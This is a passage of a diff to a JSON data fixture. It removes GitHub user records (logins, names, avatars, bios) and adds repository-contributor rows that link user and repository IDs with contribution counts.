- "following_count": 308, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 57, - "created_at": "2022-08-11T02:37:30Z", - "updated_at": "2024-07-08T08:00:59Z", - "node_id": "U_kgDOBp441Q", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:25.827Z", + "nest_updated_at": "2024-09-22T15:28:41.151Z", + "contributions_count": 10, + "repository": 41, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 93, "fields": { - "nest_created_at": "2024-09-11T19:36:42.696Z", - "nest_updated_at": "2024-09-11T19:36:42.696Z", - "name": "Yao6911", - "login": "Yao6911", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61447785?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-02-25T06:03:15Z", - "updated_at": "2023-05-23T05:58:28Z", - "node_id": "MDQ6VXNlcjYxNDQ3Nzg1", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:26.137Z", + "nest_updated_at": "2024-09-22T15:28:41.496Z", + "contributions_count": 9, + "repository": 41, + "user": 3307 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 94, "fields": { - "nest_created_at": "2024-09-11T19:36:43.931Z", - "nest_updated_at": "2024-09-11T19:36:43.931Z", - "name": "", - "login": "Alexandru93s", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/82706132?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2021-04-17T10:26:11Z", - "updated_at": "2024-08-26T07:19:04Z", - "node_id": "MDQ6VXNlcjgyNzA2MTMy", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:26.454Z", + "nest_updated_at": "2024-09-22T15:28:41.820Z", + "contributions_count": 1, + "repository": 41, + "user": 3286 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 95, "fields": { - "nest_created_at": "2024-09-11T19:36:45.194Z", - "nest_updated_at": "2024-09-11T19:36:45.194Z", - "name": "Denis Rossati", - "login": "denis-rossati", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/74881282?v=4", - "company": "Croct", - "location": "", - "collaborators_count": 0, - "following_count": 137, - "followers_count": 102, - "public_gists_count": 0, - "public_repositories_count": 59, - "created_at": "2020-11-22T22:48:29Z", - "updated_at": "2024-07-28T02:35:10Z", - "node_id": "MDQ6VXNlcjc0ODgxMjgy", - "bio": "", - "is_hireable": true, - "twitter_username": "chubby_cows" + "nest_created_at": "2024-09-22T02:49:29.330Z", + "nest_updated_at": "2024-09-22T15:28:44.655Z", + "contributions_count": 69, + "repository": 42, + "user": 3308 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 96, "fields": { - "nest_created_at": "2024-09-11T19:36:46.695Z", - "nest_updated_at": "2024-09-11T19:36:46.695Z", - "name": "Dikshant Singh", - "login": "elit3pwner", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/95041015?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 39, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2021-11-25T15:30:20Z", - "updated_at": "2024-09-07T12:57:06Z", - "node_id": "U_kgDOBao19w", - "bio": "", - "is_hireable": false, - "twitter_username": "elit3pwner" + "nest_created_at": "2024-09-22T02:49:29.653Z", + "nest_updated_at": "2024-09-22T15:28:44.966Z", + "contributions_count": 10, + "repository": 42, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 97, "fields": { - "nest_created_at": "2024-09-11T19:36:47.957Z", - "nest_updated_at": "2024-09-11T19:36:47.957Z", - "name": "Hüseyin Gülşin", - "login": "huseyingulsin", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20372673?v=4", - "company": "Radity", - "location": "İzmir", - "collaborators_count": 0, - "following_count": 73, - "followers_count": 85, - "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2016-07-09T16:36:18Z", - "updated_at": "2024-08-10T11:31:48Z", - "node_id": "MDQ6VXNlcjIwMzcyNjcz", - "bio": "cyber security engineer", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:32.543Z", + "nest_updated_at": "2024-09-22T15:28:47.700Z", + "contributions_count": 13, + "repository": 43, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 98, "fields": { - "nest_created_at": "2024-09-11T19:36:49.670Z", - "nest_updated_at": "2024-09-11T19:36:49.670Z", - "name": "", - "login": "mxm-smaler", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/85622527?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-06-09T12:00:42Z", - "updated_at": "2023-11-04T07:36:54Z", - "node_id": "MDQ6VXNlcjg1NjIyNTI3", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:35.373Z", + "nest_updated_at": "2024-09-22T15:28:50.488Z", + "contributions_count": 10, + "repository": 44, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 99, "fields": { - "nest_created_at": "2024-09-11T19:36:51.014Z", - "nest_updated_at": "2024-09-11T19:36:51.014Z", - "name": "P4R4D0X", - "login": "P4R4D0X-HACKS", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81650164?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 5, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2021-03-30T19:49:23Z", - "updated_at": "2024-09-06T18:35:58Z", - "node_id": "MDQ6VXNlcjgxNjUwMTY0", - "bio": "I am a budding hacker who wants to share his knowledge. And gain knowledge for the people .", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:35.701Z", + "nest_updated_at": "2024-09-22T15:28:50.832Z", + "contributions_count": 2, + "repository": 44, + "user": 3309 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 100, "fields": { - "nest_created_at": "2024-09-11T19:36:52.255Z", - "nest_updated_at": "2024-09-11T19:36:52.255Z", - "name": "", - "login": "K0RSHAK", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/108768069?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 11, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2022-07-05T22:17:09Z", - "updated_at": "2024-07-12T08:18:53Z", - "node_id": "U_kgDOBnurRQ", - "bio": "Engineer | Hacker | Enthusiast", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:36.017Z", + "nest_updated_at": "2024-09-22T15:28:51.140Z", + "contributions_count": 1, + "repository": 44, + "user": 198 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 101, "fields": { - "nest_created_at": "2024-09-11T19:36:53.134Z", - "nest_updated_at": "2024-09-11T19:36:53.134Z", - "name": "", - "login": "rookie720", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68784291?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-07-25T15:50:21Z", - "updated_at": "2024-09-06T03:45:49Z", - "node_id": "MDQ6VXNlcjY4Nzg0Mjkx", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:38.865Z", + "nest_updated_at": "2024-09-22T15:28:53.957Z", + "contributions_count": 13, + "repository": 45, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 102, "fields": { - "nest_created_at": "2024-09-11T19:36:54.369Z", - "nest_updated_at": "2024-09-11T19:36:54.369Z", - "name": "Michael Cade", - "login": "michaellcader", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1131078?v=4", - "company": "", - "location": "San Francisco", - "collaborators_count": 0, - "following_count": 38, - "followers_count": 36, - "public_gists_count": 37, - "public_repositories_count": 240, - "created_at": "2011-10-16T07:46:51Z", - "updated_at": "2024-05-22T02:29:27Z", - "node_id": "MDQ6VXNlcjExMzEwNzg=", - "bio": "[work from home]", - "is_hireable": false, - "twitter_username": "MikeyLcade" + "nest_created_at": "2024-09-22T02:49:41.759Z", + "nest_updated_at": "2024-09-22T15:28:56.738Z", + "contributions_count": 70, + "repository": 46, + "user": 3310 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 103, "fields": { - "nest_created_at": "2024-09-11T19:36:55.624Z", - "nest_updated_at": "2024-09-11T19:36:55.624Z", - "name": "", - "login": "ghoss23", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/121856569?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-01-03T08:38:20Z", - "updated_at": "2024-05-29T15:51:38Z", - "node_id": "U_kgDOB0NiOQ", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:42.110Z", + "nest_updated_at": "2024-09-22T15:28:57.050Z", + "contributions_count": 10, + "repository": 46, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 104, "fields": { - "nest_created_at": "2024-09-11T19:36:56.907Z", - "nest_updated_at": "2024-09-11T19:36:56.907Z", - "name": "", - "login": "Luis071727", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/109968877?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 4, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-07-25T13:34:28Z", - "updated_at": "2023-10-10T12:44:20Z", - "node_id": "U_kgDOBo397Q", - "bio": "", + "nest_created_at": "2024-09-22T02:49:42.420Z", + "nest_updated_at": "2024-09-22T15:28:57.357Z", + "contributions_count": 1, + "repository": 46, + "user": 3311 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 105, + "fields": { + "nest_created_at": "2024-09-22T02:49:45.239Z", + "nest_updated_at": "2024-09-22T15:29:00.144Z", + "contributions_count": 45, + "repository": 47, + "user": 3312 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 106, + "fields": { + "nest_created_at": "2024-09-22T02:49:45.560Z", + "nest_updated_at": "2024-09-22T15:29:00.450Z", + "contributions_count": 10, + "repository": 47, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 107, + "fields": { + "nest_created_at": "2024-09-22T02:49:45.881Z", + "nest_updated_at": "2024-09-22T15:29:00.759Z", + "contributions_count": 1, + "repository": 47, + "user": 3313 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 108, + "fields": { + "nest_created_at": "2024-09-22T02:49:46.202Z", + "nest_updated_at": "2024-09-22T15:29:01.076Z", + "contributions_count": 1, + "repository": 47, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 109, + "fields": { + "nest_created_at": "2024-09-22T02:49:48.962Z", + "nest_updated_at": "2024-09-22T15:29:03.899Z", + "contributions_count": 16, + "repository": 48, + "user": 3314 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 110, + "fields": { + "nest_created_at": "2024-09-22T02:49:49.287Z", + "nest_updated_at": "2024-09-22T15:29:04.210Z", + "contributions_count": 13, + "repository": 48, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 111, + "fields": { + "nest_created_at": "2024-09-22T02:49:49.600Z", + "nest_updated_at": "2024-09-22T15:29:04.528Z", + "contributions_count": 1, + "repository": 48, + "user": 3192 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 112, + "fields": { + "nest_created_at": "2024-09-22T02:49:52.511Z", + "nest_updated_at": "2024-09-22T15:29:07.324Z", + "contributions_count": 26, + "repository": 49, + "user": 1618 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 113, + "fields": { + "nest_created_at": "2024-09-22T02:49:52.830Z", + "nest_updated_at": "2024-09-22T15:29:07.647Z", + "contributions_count": 10, + "repository": 49, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 114, + "fields": { + "nest_created_at": "2024-09-22T02:49:53.149Z", + "nest_updated_at": "2024-09-22T15:29:07.960Z", + "contributions_count": 3, + "repository": 49, + "user": 3315 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 115, + "fields": { + "nest_created_at": "2024-09-22T02:49:53.485Z", + "nest_updated_at": "2024-09-22T15:29:08.274Z", + "contributions_count": 2, + "repository": 49, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 116, + "fields": { + "nest_created_at": "2024-09-22T02:49:55.956Z", + "nest_updated_at": "2024-09-22T15:29:10.769Z", + "contributions_count": 14, + "repository": 50, + "user": 3316 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 117, + "fields": { + "nest_created_at": "2024-09-22T02:49:56.306Z", + "nest_updated_at": "2024-09-22T15:29:11.079Z", + "contributions_count": 13, + "repository": 50, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 118, + "fields": { + "nest_created_at": "2024-09-22T02:49:56.623Z", + "nest_updated_at": "2024-09-22T15:29:11.396Z", + "contributions_count": 1, + "repository": 50, + "user": 3192 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 119, + "fields": { + "nest_created_at": "2024-09-22T02:49:59.545Z", + "nest_updated_at": "2024-09-22T15:29:14.291Z", + "contributions_count": 13, + "repository": 51, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 120, + "fields": { + "nest_created_at": "2024-09-22T02:50:02.396Z", + "nest_updated_at": "2024-09-22T15:29:17.041Z", + "contributions_count": 10, + "repository": 52, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 121, + "fields": { + "nest_created_at": "2024-09-22T02:50:02.762Z", + "nest_updated_at": "2024-09-22T15:29:17.357Z", + "contributions_count": 3, + "repository": 52, + "user": 3317 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 122, + "fields": { + "nest_created_at": "2024-09-22T02:50:03.087Z", + "nest_updated_at": "2024-09-22T15:29:17.688Z", + "contributions_count": 2, + "repository": 52, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 123, + "fields": { + "nest_created_at": "2024-09-22T02:50:05.978Z", + "nest_updated_at": "2024-09-22T15:29:20.557Z", + "contributions_count": 14, + "repository": 53, + "user": 248 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 124, + "fields": { + "nest_created_at": "2024-09-22T02:50:06.294Z", + "nest_updated_at": "2024-09-22T15:29:20.873Z", + "contributions_count": 13, + "repository": 53, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 125, + "fields": { + "nest_created_at": "2024-09-22T02:50:06.615Z", + "nest_updated_at": "2024-09-22T15:29:21.185Z", + "contributions_count": 1, + "repository": 53, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 126, + "fields": { + "nest_created_at": "2024-09-22T02:50:09.496Z", + "nest_updated_at": "2024-09-22T15:29:24.017Z", + "contributions_count": 10, + "repository": 54, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 127, + "fields": { + "nest_created_at": "2024-09-22T02:50:09.808Z", + "nest_updated_at": "2024-09-22T15:29:24.336Z", + "contributions_count": 6, + "repository": 54, + "user": 3318 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 128, + "fields": { + "nest_created_at": "2024-09-22T02:50:10.121Z", + "nest_updated_at": "2024-09-22T15:29:24.643Z", + "contributions_count": 3, + "repository": 54, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 129, + "fields": { + "nest_created_at": "2024-09-22T02:50:13.051Z", + "nest_updated_at": "2024-09-22T15:29:28.268Z", + "contributions_count": 10, + "repository": 55, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 130, + "fields": { + "nest_created_at": "2024-09-22T02:50:13.364Z", + "nest_updated_at": "2024-09-22T15:29:28.587Z", + "contributions_count": 7, + "repository": 55, + "user": 3319 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 131, + "fields": { + "nest_created_at": "2024-09-22T02:50:13.695Z", + "nest_updated_at": "2024-09-22T15:29:28.894Z", + "contributions_count": 5, + "repository": 55, + "user": 3320 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 132, + "fields": { + "nest_created_at": "2024-09-22T02:50:14.009Z", + "nest_updated_at": "2024-09-22T15:29:29.208Z", + "contributions_count": 3, + "repository": 55, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 133, + "fields": { + "nest_created_at": "2024-09-22T02:50:16.904Z", + "nest_updated_at": "2024-09-22T15:29:32.172Z", + "contributions_count": 32, + "repository": 56, + "user": 3321 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 134, + "fields": { + "nest_created_at": "2024-09-22T02:50:17.262Z", + "nest_updated_at": "2024-09-22T15:29:32.500Z", + "contributions_count": 10, + "repository": 56, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 135, + "fields": { + "nest_created_at": "2024-09-22T02:50:17.576Z", + "nest_updated_at": "2024-09-22T15:29:32.816Z", + "contributions_count": 3, + "repository": 56, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 136, + "fields": { + "nest_created_at": "2024-09-22T02:50:20.464Z", + "nest_updated_at": "2024-09-22T15:29:35.585Z", + "contributions_count": 13, + "repository": 57, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 137, + "fields": { + "nest_created_at": "2024-09-22T02:50:23.354Z", + "nest_updated_at": "2024-09-22T15:29:38.390Z", + "contributions_count": 13, + "repository": 58, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 138, + "fields": { + "nest_created_at": "2024-09-22T02:50:26.244Z", + "nest_updated_at": "2024-09-22T15:29:41.324Z", + "contributions_count": 13, + "repository": 59, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 139, + "fields": { + "nest_created_at": "2024-09-22T02:50:26.573Z", + "nest_updated_at": "2024-09-22T15:29:41.634Z", + "contributions_count": 4, + "repository": 59, + "user": 44 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 140, + "fields": { + "nest_created_at": "2024-09-22T02:50:30.216Z", + "nest_updated_at": "2024-09-22T15:29:45.107Z", + "contributions_count": 13, + "repository": 60, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 141, + "fields": { + "nest_created_at": "2024-09-22T02:50:33.126Z", + "nest_updated_at": "2024-09-22T15:29:47.918Z", + "contributions_count": 24, + "repository": 61, + "user": 3322 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 142, + "fields": { + "nest_created_at": "2024-09-22T02:50:33.454Z", + "nest_updated_at": "2024-09-22T15:29:48.228Z", + "contributions_count": 10, + "repository": 61, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 143, + "fields": { + "nest_created_at": "2024-09-22T02:50:33.772Z", + "nest_updated_at": "2024-09-22T15:29:48.541Z", + "contributions_count": 2, + "repository": 61, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 144, + "fields": { + "nest_created_at": "2024-09-22T02:50:36.646Z", + "nest_updated_at": "2024-09-22T15:29:51.540Z", + "contributions_count": 10, + "repository": 62, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 145, + "fields": { + "nest_created_at": "2024-09-22T02:50:36.959Z", + "nest_updated_at": "2024-09-22T15:29:51.889Z", + "contributions_count": 9, + "repository": 62, + "user": 222 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 146, + "fields": { + "nest_created_at": "2024-09-22T02:50:37.275Z", + "nest_updated_at": "2024-09-22T15:29:52.206Z", + "contributions_count": 2, + "repository": 62, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 147, + "fields": { + "nest_created_at": "2024-09-22T02:50:37.598Z", + "nest_updated_at": "2024-09-22T15:29:52.520Z", + "contributions_count": 1, + "repository": 62, + "user": 3323 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 148, + "fields": { + "nest_created_at": "2024-09-22T02:50:43.818Z", + "nest_updated_at": "2024-09-22T15:29:58.450Z", + "contributions_count": 10, + "repository": 64, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 149, + "fields": { + "nest_created_at": "2024-09-22T02:50:44.161Z", + "nest_updated_at": "2024-09-22T15:29:58.776Z", + "contributions_count": 9, + "repository": 64, + "user": 3324 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 150, + "fields": { + "nest_created_at": "2024-09-22T02:50:44.477Z", + "nest_updated_at": "2024-09-22T15:29:59.122Z", + "contributions_count": 4, + "repository": 64, + "user": 3325 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 151, + "fields": { + "nest_created_at": "2024-09-22T02:50:44.786Z", + "nest_updated_at": "2024-09-22T15:29:59.474Z", + "contributions_count": 3, + "repository": 64, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 152, + "fields": { + "nest_created_at": "2024-09-22T02:50:47.681Z", + "nest_updated_at": "2024-09-22T15:30:02.308Z", + "contributions_count": 13, + "repository": 65, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 153, + "fields": { + "nest_created_at": "2024-09-22T02:50:47.998Z", + "nest_updated_at": "2024-09-22T15:30:02.627Z", + "contributions_count": 6, + "repository": 65, + "user": 3326 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 154, + "fields": { + "nest_created_at": "2024-09-22T02:50:48.313Z", + "nest_updated_at": "2024-09-22T15:30:02.935Z", + "contributions_count": 4, + "repository": 65, + "user": 933 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 155, + "fields": { + "nest_created_at": "2024-09-22T02:50:51.185Z", + "nest_updated_at": "2024-09-22T15:30:05.886Z", + "contributions_count": 39, + "repository": 66, + "user": 3327 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 156, + "fields": { + "nest_created_at": "2024-09-22T02:50:51.498Z", + "nest_updated_at": "2024-09-22T15:30:06.193Z", + "contributions_count": 13, + "repository": 66, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 157, + "fields": { + "nest_created_at": "2024-09-22T02:50:54.325Z", + "nest_updated_at": "2024-09-22T15:30:09.010Z", + "contributions_count": 13, + "repository": 67, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 158, + "fields": { + "nest_created_at": "2024-09-22T02:50:54.653Z", + "nest_updated_at": "2024-09-22T15:30:09.325Z", + "contributions_count": 1, + "repository": 67, + "user": 117 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 159, + "fields": { + "nest_created_at": "2024-09-22T02:50:58.283Z", + "nest_updated_at": "2024-09-22T15:30:12.860Z", + "contributions_count": 1, + "repository": 68, + "user": 113 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 160, + "fields": { + "nest_created_at": "2024-09-22T02:51:01.098Z", + "nest_updated_at": "2024-09-22T15:30:15.727Z", + "contributions_count": 48, + "repository": 69, + "user": 958 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 161, + "fields": { + "nest_created_at": "2024-09-22T02:51:01.410Z", + "nest_updated_at": "2024-09-22T15:30:16.047Z", + "contributions_count": 13, + "repository": 69, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 162, + "fields": { + "nest_created_at": "2024-09-22T02:51:01.722Z", + "nest_updated_at": "2024-09-22T15:30:16.357Z", + "contributions_count": 1, + "repository": 69, + "user": 976 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 163, + "fields": { + "nest_created_at": "2024-09-22T02:51:02.040Z", + "nest_updated_at": "2024-09-22T15:30:16.706Z", + "contributions_count": 1, + "repository": 69, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 164, + "fields": { + "nest_created_at": "2024-09-22T02:51:04.869Z", + "nest_updated_at": "2024-09-22T15:30:19.499Z", + "contributions_count": 9, + "repository": 70, + "user": 3281 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 165, + "fields": { + "nest_created_at": "2024-09-22T02:51:05.180Z", + "nest_updated_at": "2024-09-22T15:30:19.827Z", + "contributions_count": 2, + "repository": 70, + "user": 3328 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 166, + "fields": { + "nest_created_at": "2024-09-22T02:51:05.493Z", + "nest_updated_at": "2024-09-22T15:30:20.133Z", + "contributions_count": 1, + "repository": 70, + "user": 3329 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 167, + "fields": { + "nest_created_at": "2024-09-22T02:51:09.081Z", + "nest_updated_at": "2024-09-22T15:30:23.556Z", + "contributions_count": 13, + "repository": 71, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 168, + "fields": { + "nest_created_at": "2024-09-22T02:51:12.756Z", + "nest_updated_at": "2024-09-22T15:30:27.128Z", + "contributions_count": 22, + "repository": 72, + "user": 3330 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 169, + "fields": { + "nest_created_at": "2024-09-22T02:51:13.076Z", + "nest_updated_at": "2024-09-22T15:30:27.432Z", + "contributions_count": 13, + "repository": 72, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 170, + "fields": { + "nest_created_at": "2024-09-22T02:51:16.627Z", + "nest_updated_at": "2024-09-22T15:30:30.878Z", + "contributions_count": 13, + "repository": 73, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 171, + "fields": { + "nest_created_at": "2024-09-22T02:51:19.665Z", + "nest_updated_at": "2024-09-22T15:30:33.776Z", + "contributions_count": 12, + "repository": 74, + "user": 3331 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 172, + "fields": { + "nest_created_at": "2024-09-22T02:51:19.996Z", + "nest_updated_at": "2024-09-22T15:30:34.202Z", + "contributions_count": 10, + "repository": 74, + "user": 3332 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 173, + "fields": { + "nest_created_at": "2024-09-22T02:51:20.309Z", + "nest_updated_at": "2024-09-22T15:30:34.509Z", + "contributions_count": 10, + "repository": 74, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 174, + "fields": { + "nest_created_at": "2024-09-22T02:51:20.625Z", + "nest_updated_at": "2024-09-22T15:30:34.819Z", + "contributions_count": 2, + "repository": 74, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 175, + "fields": { + "nest_created_at": "2024-09-22T02:51:23.626Z", + "nest_updated_at": "2024-09-22T15:30:37.750Z", + "contributions_count": 32, + "repository": 75, + "user": 3302 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 176, + "fields": { + "nest_created_at": "2024-09-22T02:51:23.936Z", + "nest_updated_at": "2024-09-22T15:30:38.056Z", + "contributions_count": 10, + "repository": 75, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 177, + "fields": { + "nest_created_at": "2024-09-22T02:51:24.246Z", + "nest_updated_at": "2024-09-22T15:30:38.377Z", + "contributions_count": 4, + "repository": 75, + "user": 3286 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 178, + "fields": { + "nest_created_at": "2024-09-22T02:51:24.560Z", + "nest_updated_at": "2024-09-22T15:30:38.686Z", + "contributions_count": 3, + "repository": 75, + "user": 3303 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 179, + "fields": { + "nest_created_at": "2024-09-22T02:51:24.894Z", + "nest_updated_at": "2024-09-22T15:30:39.001Z", + "contributions_count": 1, + "repository": 75, + "user": 3333 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 180, + "fields": { + "nest_created_at": "2024-09-22T02:51:27.798Z", + "nest_updated_at": "2024-09-22T15:30:41.738Z", + "contributions_count": 13, + "repository": 76, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 181, + "fields": { + "nest_created_at": "2024-09-22T02:51:28.115Z", + "nest_updated_at": "2024-09-22T15:30:42.046Z", + "contributions_count": 8, + "repository": 76, + "user": 3334 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 182, + "fields": { + "nest_created_at": "2024-09-22T02:51:31.757Z", + "nest_updated_at": "2024-09-22T15:30:45.514Z", + "contributions_count": 13, + "repository": 77, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 183, + "fields": { + "nest_created_at": "2024-09-22T02:51:35.329Z", + "nest_updated_at": "2024-09-22T15:30:48.991Z", + "contributions_count": 13, + "repository": 78, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 184, + "fields": { + "nest_created_at": "2024-09-22T02:51:38.891Z", + "nest_updated_at": "2024-09-22T15:30:52.568Z", + "contributions_count": 13, + "repository": 79, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 185, + "fields": { + "nest_created_at": "2024-09-22T02:51:42.604Z", + "nest_updated_at": "2024-09-22T15:30:56.007Z", + "contributions_count": 13, + "repository": 80, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 186, + "fields": { + "nest_created_at": "2024-09-22T02:51:47.296Z", + "nest_updated_at": "2024-09-22T15:31:00.507Z", + "contributions_count": 35, + "repository": 81, + "user": 6 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 187, + "fields": { + "nest_created_at": "2024-09-22T02:51:47.614Z", + "nest_updated_at": "2024-09-22T15:31:00.814Z", + "contributions_count": 13, 